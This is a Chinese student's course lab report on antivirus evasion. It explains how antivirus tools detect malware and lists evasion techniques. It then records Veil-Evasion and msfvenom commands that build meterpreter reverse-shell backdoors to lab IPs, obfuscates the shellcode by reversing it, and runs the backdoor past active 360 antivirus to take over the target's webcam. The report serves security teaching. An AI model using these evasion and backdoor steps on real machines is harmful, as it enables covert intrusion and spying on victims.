20145240《网络攻防》免杀原理与实践

免杀原理与实践

1.基础问题回答

（1）杀软是如何检测出恶意代码的？

杀毒软件(AV)是一个较大规模安全防护策略的重要组成部分，能够减缓恶意软件在互联网上的传播速度，保护用户主机。

特征库举例：首先对已经有过的恶意代码建立特征库，对其特征码进行匹配检测，若匹配成功，则为恶意代码需进行防范。

因此有些新型恶意代码则更容易绕过杀软，在被检测出之前，可能有部分用户会被感染，因此需要及时更新恶意代码特征库。

启发式恶意软件检测：根据些片面特征去推断。通常是因为缺乏精确判定依据。

基于行为的恶意软件检测：监控该代码的行为，看是否有恶意行为，或正在做与恶意代码所做的事情相同，威胁到主机安全，则极有可能为恶意代码。

（2）免杀是做什么？

免杀即“反杀毒技术”，让安插的后门不被AV软件发现。通过改变代码的特征，让杀毒软件成为摆设，防止被杀软查杀的一种技术。

（3）免杀的基本方法有哪些？

修改方法：

方法一:直接修改特征码的十六进制法

方法二:修改字符串大小写法

方法三:等价替换法

方法四:指令顺序调换法

方法五:通用跳转法

方法六:一键加壳法

文件免杀方法：

加冷门壳

加壳改壳

加花指令

改程序入口点

2.实践总结与体会

每次实验在学习到新知识的同时而且也刷新自己对网络安全的认知，曾经以为杀毒软件很安全了的，没想到自己做的小程序杀毒软件都查杀不出来，何况更厉害的程序员编的呢？感觉想绕过杀毒软件简直是轻而易举。虽然我们电脑里没有什么重要的文件，日常生活中不能因为这样就不用杀毒软件了，还是要定期杀毒，定期更新。

3.离实战还缺些什么技术或步骤？

或许我们应该再学习一些如何潜如目标主机且不被发现的技术，因为如果要实战的话，我们这方面的能力还是不够的， 还是无法神不知鬼不觉侵入目标主机，我们编代码的能力也需要提高，代码特征库在不断更新，我们也要不断更新自己的技术。

4.实践过程记录

(1)理解免杀技术原理

让安插的后门不被AV软件发现，轻易获得靶机各种权限。通过改变代码的特征，让杀毒软件成为摆设，防止被杀软查杀的一种技术。

(2)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧；

Veil-Evasion免杀平台

在终端下输入指令veil-evasion即可打开软件，依次输入以下指令

use python/meterpreter/rev_tcp  //设置payload
set LHOST 192.168.208.128    //设置反弹连接IP
set LPORT 443    //设置反弹端口443
generate    //生成
5240    //程序名
1

输入生成的程序名称后，选择1，默认配置。



生成成功。



并将生成的文件拷到靶机，发现被杀毒软件查杀



使用VirSCAN.org检测



在靶机上运行5240.exe ，kali成功获取权限。

(3)通过组合应用各种技术实现恶意代码免杀

利用shellcode编写后门程序的检测

在kali终端，执行指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.130 LPORT=443 -f c

,生成一个c语言格式的Shellcode数组



将生成的代码从虚拟机里拷贝出来，用Visual C++ 6.0进行编译运行生成可执行文件lsj.exe

然后在kali下进入msf打开监听进程，在靶机上运行可执行文件ymj.exe，kali成功获取权限



再次用VirSCAN.org进行检测,结果如下。能检测出来的概率已经变低很多了。



不难发现，利用shellcode编写后门程序相比上一次通过msfvenom指令生成一个后门程序而言，风险降低了很多，但是仍有很大概率被检测为病毒文件，我们对代码进行进一步改进。

尝试修改shellcode—将shellcode逆序

我们对这个数组做一些变化，原有shellcode不变，只在vc下对源代码进行修改将shellcode先进行逆序操作得到另外一个数组，然后之后再把它逆序回来, 回连测试。



再次用VirSCAN.org进行检测，发现很多杀毒软件已经倒下了。。

(4)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

按照上次实验用过的msf监听方法在Kali上打开监听，在Windows主机开启杀软（Win8安装360杀毒）的情况下，运行最后生成的优化版lsj2.exe文件，获取摄像头，为图书馆。